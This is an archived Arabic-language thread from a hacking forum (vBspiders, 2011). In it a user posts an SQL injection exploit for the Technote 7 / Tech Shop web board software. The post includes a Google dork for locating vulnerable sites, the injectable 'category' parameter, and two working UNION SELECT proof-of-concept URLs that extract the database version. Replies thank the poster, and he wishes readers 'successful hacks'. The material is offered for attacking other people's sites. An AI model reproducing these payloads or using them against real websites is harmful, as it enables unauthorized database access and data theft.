:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   Tech Shop Technote 7 SQL Injection Vulnerability (http://www.vbspiders.com/vb/t41141.html)

Dr.NaNo 01-02-2011 03:58 PM

Tech Shop Technote 7 SQL Injection Vulnerability
 

سلام عليكم شباب كيفكم ..


كود:

# Google Dork: inurl:/technote/board.php?category=


Exploit : 
 http://site/board.php?board=boarname&category=[SQL Line]

--------------------------------------------------------------------------

PoC(Technote7) : 
 http://localhost/board.php?board=skinmarket&category=11 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61--
 
PoC(Technote7 - Techshop 1.2) :
 
 http://localhost/board.php?board=agcmain&category=10 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,@@version,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71--

اكثر ....


بالتوفيق للجميع .


Dr.NaNo

Amine-Hacker 01-02-2011 04:53 PM

مشكوووووووووووووووووور أخي الكريم

Dr.NaNo 01-02-2011 07:03 PM

العفوأ ياغالي نورت الموضوع.


اختراقات موفقة ..


الساعة الآن 02:13 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0